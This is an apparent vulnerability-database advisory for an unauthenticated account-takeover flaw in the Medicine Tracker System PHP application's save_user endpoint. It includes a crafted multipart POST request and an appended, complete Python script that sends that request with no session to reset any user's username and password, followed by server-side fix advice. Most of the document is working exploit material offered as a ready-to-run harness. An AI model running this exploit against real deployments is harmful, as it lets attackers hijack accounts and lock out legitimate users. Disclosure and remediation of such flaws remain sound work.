| Title | Medicine Tracker System Improper Access Control |
|---|
| Description | An Improper Access Control vulnerability has been discovered in Medicine Tracker System. A remote, unauthenticated attacker can exploit it by sending a crafted request; successful exploitation allows the attacker to change any user's username and password.
The vulnerable URI is POST /php-mts/classes/Users.php?f=save_user. When the value of the "id" form field matches an existing user, the attacker can change that user's username, password and other information. No Cookie is required for this operation, which means the endpoint can be exploited without authentication.
A malicious request is shown below:
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
**********************************************************

------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="id"

2
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="firstname"

a
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="middlename"

b
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="lastname"

c
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="username"

foo
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="password"

foo123
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z--
The user with id=2 will then have its credentials set to foo/foo123. |
|---|
| Source | https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 17/03/2023 09:18 AM (3 years ago) |
|---|
| Moderation | 17/03/2023 12:19 PM (3 hours later) |
|---|
| Status | Approved |
|---|
| VulDB Entry | 223311 [SourceCodester Medicine Tracker System 1.0 Users.php?f=save_user firstname/middlename/lastname/username/password weak authentication] |
|---|
| Points | 20 |
|---|
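As an added reproduction harness (this is not code from the submitter or from the Medicine Tracker System project), the following Python script builds the same multipart body shown in the description and sends it with no Cookie header, which is the condition the advisory relies on. Only the endpoint path, the form field names and the boundary string come from the advisory; the base URL, the lab host 127.0.0.1:8080 and the helper names are assumptions. It uses only the standard library, so it runs anywhere.

```python
import urllib.error
import urllib.request

# Endpoint path and boundary are copied from the advisory's sample request.
SAVE_USER_PATH = "/php-mts/classes/Users.php?f=save_user"
BOUNDARY = "----WebKitFormBoundaryPE5dieOmOyIpLQ4Z"


def save_user_fields(user_id, username, password,
                     firstname="a", middlename="b", lastname="c"):
    """Ordered form fields for f=save_user, in the order the advisory sends them.

    `id` selects the victim row; every other field overwrites a column of that row.
    """
    return [
        ("id", str(user_id)),
        ("firstname", firstname),
        ("middlename", middlename),
        ("lastname", lastname),
        ("username", username),
        ("password", password),
    ]


def encode_multipart(fields, boundary=BOUNDARY):
    """Encode (name, value) pairs as a multipart/form-data body.

    Each part is delimited by --boundary, carries a Content-Disposition header,
    then a blank line, then the value; the body ends with --boundary-- and CRLF.
    """
    lines = []
    for name, value in fields:
        lines.append(f"--{boundary}")
        lines.append(f'Content-Disposition: form-data; name="{name}"')
        lines.append("")
        lines.append(value)
    lines.append(f"--{boundary}--")
    lines.append("")
    return "\r\n".join(lines).encode("utf-8")


def build_request(base_url, fields, boundary=BOUNDARY):
    """Build the unauthenticated POST. No Cookie header is added on purpose."""
    body = encode_multipart(fields, boundary)
    req = urllib.request.Request(
        base_url.rstrip("/") + SAVE_USER_PATH, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    return req


def send(req, timeout=10):
    """Send the request and return (status, body); HTTP errors are returned, not raised."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # Assumed lab host; point this at your own test instance, never at a third party.
    TARGET = "http://127.0.0.1:8080"
    fields = save_user_fields(2, "foo", "foo123")
    status, body = send(build_request(TARGET, fields))
    print(status, body[:200])
```

Run it against a local copy of the application; the advisory gives no response format, so confirm the change by logging in through the application's own login form with the new credentials (foo/foo123 for id=2), and restore the original row afterwards. The fix on the server side is the usual one for this class of bug: save_user must reject requests without a valid session, and must either restrict the operation to administrators or ignore the submitted id and use the id bound to the session.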